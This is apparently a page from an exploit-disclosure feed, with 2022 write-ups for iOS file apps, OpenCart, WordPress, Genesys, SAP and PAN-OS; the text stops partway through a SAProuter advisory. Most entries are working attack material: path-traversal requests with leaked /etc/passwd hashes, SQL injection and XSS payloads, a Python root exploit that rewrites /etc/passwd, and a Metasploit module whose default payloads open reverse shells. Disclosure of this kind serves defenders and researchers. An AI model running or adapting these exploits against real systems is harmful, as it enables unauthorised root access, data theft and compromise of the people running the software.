PhotoSync version 4.7 suffers from a local file inclusion vulnerability.

    # Exploit Title: PhotoSync 4.7 IOS APP Local file inclusion# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.photosync-app.com/home.html# Software Link:https://apps.apple.com/us/app/photosync-transfer-photos/id415850124# Version: 4.7# Tested on: iPhone IOS 16.0GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close-------HTTP/1.1 200 OKDate: Mon, 19 Sep 2022 06:35:11 GMTAccept-Ranges: bytesContent-Length: 2791### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false_avphidbridge:*:288:288:Apple Virtual Platform HIDBridge:/var/empty:/usr/bin/false_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false

PhotoSync 4.7 Local File Inclusion

Owlfiles File Manager version 12.0.1 suffers from local file inclusion and path traversal vulnerabilities.

    # Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/owlfiles-file-manager/id510282524# Version: 12.0.1# Tested on: Ios 16.0###########path traversal on HTTP built-in server###########GET /../../../../../../../../../../../../../../../System/ HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9If-None-Match: 42638202/1663558201/177889085If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMTConnection: closeContent-Length: 0-------HTTP/1.1 200 OKCache-Control: max-age=3600, publicContent-Length: 317Content-Type: text/html; charset=utf-8Connection: CloseServer: GCDWebUploaderDate: Mon, 19 Sep 2022 05:01:11 GMT<!DOCTYPE html><html><head><meta charset="utf-8"></head><body><ul><li><a href="Cryptexes/">Cryptexes/</a></li><li><a href="DriverKit/">DriverKit/</a></li><li><a href="Library/">Library/</a></li><li><a href="Applications/">Applications/</a></li><li><a href="Developer/">Developer/</a></li></ul></body></html>#############LFI on HTTP built-in server#############GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.8.101:8080Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25X-Requested-With: XMLHttpRequestReferer: http://192.168.8.101:8080/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close----HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Sat, 03 Sep 2022 01:37:01 GMTDate: Mon, 19 Sep 2022 03:28:14 GMTContent-Length: 213Cache-Control: max-age=3600, publicEtag: 1152921500312187994/1662169021/0### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost###############path traversal on FTP built-in server###############ftp> cd ../../../../../../../../../250 OK. Current directory is /../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        608 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        224 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        640 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1131 Jan 01 1970 devdrwxr-xr-x     0 root admin       4512 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp>#############XSS on HTTP built-in server#############poc 1:http://192.168.8.101:8080/download?path=<script>alert(rose)</script>poc 2:http://192.168.8.101:8080/list?path=<script>alert(rose)</script>

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion

Red Hat Security Advisory 2022-6541-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6541-01

OpenCart 3.x Newsletter Custom Popup module version 4.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection# Date: 18/09/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added# Version: v.4.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivecreatedate=2022-8-28%2019:4:6&email=hi&status=0===========Output :Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

WordPress GetYourGuide Ticketing plugin version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # *Exploit Title*: WordPress Plugin ‘GetYourGuide Ticketing’  - StoredCross-Site Scripting# Date: 18-09-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage:https://wordpress.org/plugins/search/GetYourGuide+Ticketing/# Version: 1.0.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# *Vulnerable code*:``` <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input> ```# *POC*:1- Install the plugin ‘GetYourGuide Ticketing’ & activate it.2- Navigate toward the GYG-Ticketing3- Enter the XSS payload ` “><img src=x onerror=alert(1)>`4- Go to link builder to verify the XSS pop-up.#* POC image*:https://imgur.com/amrDhIt

WordPress GetYourGuide Ticketing 1.0.1 Cross Site Scripting

Genesys PureConnect as of their build on 08-October-2020 suffers from a cross site scripting vulnerability.

    Product: Genesys PureConnect - Interaction Web Tools Chat ServiceDescription: Interaction Web Tools Chat Service allows XSS within the Printable Chat History via the participant -> name JSON POST parameter.Vulnerability Type: XSSVendor of Product: Genesys PureConnectAffected Product Code Base: Interaction Web Tools - Chat Service - Appears to be all versions up to current releaseAffected Component: "Print" feature of the Interaction Web Tools Chat: https://help.genesys.com/pureconnect/mergedprojects/wh_tr/desktop/pdfs/web_tools_dg.pdfAttack Vectors:  *   To exploit the Cross-Site Scripting vulnerability, visit https://<vulnerable-domain>/I3Root/chatOrCallback.html<https://%3cvulnerable-domain%3e/I3Root/chatOrCallback.html>  *   Then select the 'I don't have an account" option, and enter the name "><script>alert(1)</script>  *   Then press 'Start Chat'  *   Then enter anything in the chat box like 'asdfg' and press send  *   Now select the 'Printable Chat History' in the top right corner  *   XSS will trigger. You can google dork for vulnerable versions with inurl:"/I3Root/chatOrCallback.html"I'm assuming if an admin tries to print the chat conversation, it will trigger for them as well. Unable to confirm though.Discoverer: Jake Murphy - Echelon Risk + Cyber - https://echeloncyber.com/> [References]> http://genesys.com> http://interaction.com

Genesys PureConnect Cross Site Scripting

SAPControl Web Service Interface (sapstartsrv) suffers from a privilege escalation vulnerability via a race condition.

SEC Consult Vulnerability Lab Security Advisory < 20220915-0 >  
=======================================================================  
               title: Local privilege escalation  
             product: SAP® SAPControl Web Service Interface (sapuxuserchk)  
  vulnerable version: see section "Vulnerable /  tested versions"  
       fixed version: see SAP security note 3158619  
          CVE number: CVE-2022-29614  
              impact: medium  
            homepage: https://www.sap.com/about.html  
               found: 2022-02-24  
                  by: M. Li (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"The SAP Start Service (sapstartsrv) provides basic management services for  
systems and instances and single server processes. Services include starting  
and stopping, monitoring the current run-time state, reading logs, traces and  
configuration files, executing commands and retrieving other  
technology-specific information, like network access points, active sessions,  
thread list etc. They are exposed by a SOAP Web service interface named  
"SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158619, where the  
documented issue is fixed according to the vendor. We advise installing the  
corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Local privilege escalation (CVE-2022-29614)  
The SUID-root program sapuxuserchk erroneously follows the symbolic link to  
create a temporary local logon ticket and change the ownership of the target  
file for owner access only. As member of the group sapsys, a user can therefore  
escalate his/her privileges to root on a local Unix system by successfully  
exploiting a race condition.

Proof of concept:  
-----------------  
1) Local privilege escalation (CVE-2022-29614)  
The utility sapuxuserchk is used by sapcontrol to request a temporary local  
logon ticket in the following way. As a result, the ticket is created in the  
folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*  
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0  
-rw------- 1 user0  users  40 Feb 25 09:00 logon1  
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it  
requires a utility with SUID bit set. The owner, group and its permission bits  
of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk  
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server  
sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which  
contains the ticket path, user name and ticket in the plaintext, as an example  
shown below.

$ strings input-0-plaintext  
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1  
  user0  
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to  
guarantee the non-existence of the file prior to the creation in the  
function internal_create_saplogon_file.

However, it introduces a race condition between the stat and open calls, as  
shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)  
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3  
  fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1  
pointing to a privileged file such as /etc/passwd and meanwhile invoke the  
SUID-root program sapuxuserchk, in the hope that the creation of the link  
take place between the stat and open calls, so that the first will fail,  
(meaning that the file does not exist yet) while the second as well as the  
ensuing fchown call succeeds. In a positive result, the attacker gains the  
read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the  
root privilege. The PoC further below lists the exploit implementing the idea  
above with a pre-intercepted message for user secadm.

-------------------------------------------------------------------------  
sh-4.3$ id  
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd  
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py  
this many tries: 629  
[+] now login as sapmatt

sh-4.3$ su sapmatt  
Password:

sh-4.3# id  
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd  
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd

$ cat sapmatt.py  
import sys, os, signal, base64, random, string

secadm_msg =   
b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='  
# openssl passwd sappass  
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"  
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"  
target_file = "/etc/passwd"

g = 1024  
if not os.path.isfile(logon_symlink):  
         os.system("touch " + logon_symlink)  
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))  
f0 = open(msg_file, "wb")  
f0.write(secadm_msg)  
f0.close()

pid = os.fork()  
if pid == 0:  
         j = 0  
         while True:  
                 if j > g:  
                         print('done')  
                         os._exit(os.EX_OK)  
                 j += 1  
                 os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))  
else:  
         i = 0  
         uid = os.getuid()  
         success = False  
         while not success:  
                 if i > g:  
                         print("[-] give up, link too many tries: " + str(i))  
                         break  
                 i += 1  
                 try:  
                         os.unlink(logon_symlink)  
                         os.symlink(target_file, logon_symlink)  
                         statinfo = os.stat(target_file)  
                         if statinfo.st_uid == uid:  
                                 os.kill(pid, signal.SIGILL)  
                                 print("this many tries: " + str(i))  
                                 print("[+] now login as sapmatt ")  
                                 f = open(target_file, "w")  
                                 f.write(u1_passwd)  
                                 f.close()  
                                 success = True  
                 except Exception as err:  
                         print('[-] lost the race {0}'.format(err))  
         os.waitpid(pid, 0)  
         os.unlink(msg_file)

-------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version of the binary was found to be vulnerable during our tests:  
* Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered  
vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:  
* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88  
* KRNL64NUC 7.22, 7.22EXT, 7.49  
* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53  
* SAPHOSTAGENT 7.2

Please refer to the vendor patch day post:  
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-04: Vendor confirms receipt and assigns SAP security incident number  
             #2270008914.  
2022-04-29: Requesting status update.  
2022-05-05: Vendor confirms vulnerability and states it might be addressed  
             in May 2022 patch day.  
2022-06-14: Vendor releases patches with SAP security note 3158619.  
2022-06-15: Requesting the confirmation of the security note on the issue.  
2022-08-11: Vendor sends the link to the Acknowledgements to Security  
             Researchers.  
2022-09-02: Requesting the confirmation of the fix.  
2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.  
2022-09-15: Public release of security advisory.

Solution:  
---------  
The following security note needs to be implemented:  
https://launchpad.support.sap.com/#/notes/3158619

Workaround:  
-----------  
You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sapuxuserchk

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2022

SAP SAPControl Web Service Interface Local Privilege Escalation

This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  require 'ipaddr'  class InvalidRequest < StandardError  end  class InvalidResponse < StandardError  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',        'Description' => %q{          An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated          administrators to execute arbitrary OS commands with root privileges.          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10        },        'Author' => [          'Mikhail Klyuchnikov', # Vulnerability discovery          'Nikita Abramov', # Vulnerability discovery          'UnD3sc0n0c1d0', # Exploit          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2020-2038'],          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit        ],        'DisclosureDate' => '2020-09-09',        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Privileged' => true,        'Targets' => [          [            'Linux ',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %i[echo printf],              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Unix In-Memory',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])      ]    )  end  def check    print_status('Authenticating...')    begin      @api_key = api_key    rescue InvalidRequest, InvalidResponse => e      return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")    end    res = send_request_cgi({      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'type' => 'version',        'key' => @api_key      }    })    return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body    version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)    if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||       version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||       version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')      return Exploit::CheckCode::Appears    end    Exploit::CheckCode::Safe  end  def api_key    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'type' => 'keygen',        'user' => datastore['USERNAME'],        'password' => datastore['PASSWORD']      }    })    if res.nil?      raise InvalidRequest, 'Unreachable'    end    if res.code == 401      raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'    end    if res.code == 403      raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'    end    if res.body.blank?      raise InvalidResponse, 'Empty reply from server'    end    key = res.get_xml_document.xpath('/response/result/key')&.text    if key.nil?      raise InvalidResponse, 'Empty reply from server'    end    print_good('Successfully obtained api key')    key  end  def execute_command(cmd, _opts = {})    payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/'),      'vars_get' => {        'cmd' => payload,        'type' => 'op',        'key' => @api_key      }    })  end  def exploit    begin      @api_key ||= api_key    rescue InvalidRequest, InvalidResponse => e      fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")    end    print_status('Exploiting...')    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Palo Alto Networks Authenticated Remote Code Execution

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

Packet Fence 12.0.0

SAP SAProuter suffers from an improper access control vulnerability where permitting loopback traffic can lead to unexpected behavior.

SEC Consult Vulnerability Lab Security Advisory < 20220914-0 >  
=======================================================================  
               title: Improper Access Control  
             product: SAP® SAProuter  
  vulnerable version: see section "Vulnerable / tested versions"  
       fixed version: see SAP security note 3158375  
          CVE number: CVE-2022-27668  
              impact: high  
            homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html  
               found: 2022-02-25  
                  by: Fabian Hagg (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"SAProuter is a software application that provides a remote connection  
between our customer's network and SAP. SAProuter can be used to:

- Improve network security, e.g.by using a password or by only allowing  
   encrypted connections from known sources  
- Control and log the connections to your SAP system  
- Set up an indirect connection when programs involved cannot  
   communicate with each other due to the network configuration  
- Increase performance and stability by reducing the SAP system workload  
   within a local area network (LAN) when communicating with a wide area  
   network (WAN)" [1]

[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158375, where the  
documented issue is fixed according to the vendor. We advise installing the  
correction as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Improper Access Control (CVE-2022-27668)  
According to SAP note 1853140: "in the default configuration, the  
SAProuter does not allow a route to itself. You can explicitly permit  
the 'loopback' from the SAProuter to itself using option -X".

It has been identified that under certain circumstances, this is not  
valid and may lead to unexpected behavior. External attackers having  
network-wise access to a (weakly configured) SAProuter instance can  
exploit an improper access control vulnerability by sending packets  
of type NI_ROUTE in order to establish a tunnel that allows to manage  
the SAProuter externally even when it was started without option -X.

This enables an attacker to send packets of type ROUTER_ADM in order to  
gain unauthorized access to administrative functions such as stopping  
the remote SAProuter instance, displaying connection information,  
switching trace level, or terminating a specific connection.

Proof of concept:  
-----------------  
1) Improper Access Control (CVE-2022-27668)  
For successful exploitation of this vulnerability, the following prerequisites  
must be met:

- Route permission table saprouttab must contain an entry that  
   explicitly permits external hosts to connect to port 3299 of  
   arbitrary hosts. Some examples of such entries are shown in  
   the following listing:

   P  <source-host incl. attacker-controlled machine>  *  3299  
   P  <source-host incl. attacker-controlled machine>  *  3200.3300

- SAProuter is running (option -X does not need to be set) and the  
   attacker has network-wise access to its listening port.

The vulnerability can be verified by means of the publicly available  
Python script router_portfw.py [2] of the open source pysap framework  
developed by M. Gallo. The script, which is based on a scapy re-implementation  
of the proprietary SAP Router protocol, allows for port forwarding through  
a SAProuter service.

For demonstration purposes, the following simplified lab setup is used:

-------------------------------------------------------------------------  
SAProuter (IPv4:192.168.56.103) <-----> Attacker (IPv4:192.168.56.104)  
-------------------------------------------------------------------------  
SAProuter started with option -r:  |    Pysap framework  
./saprouter -r                     |  
                                    |  
Content of saprouttab in workdir:  |  
P  192.168.56.104  *  3299         |  
-------------------------------------------------------------------------

The following listing shows that it is not possible to establish a  
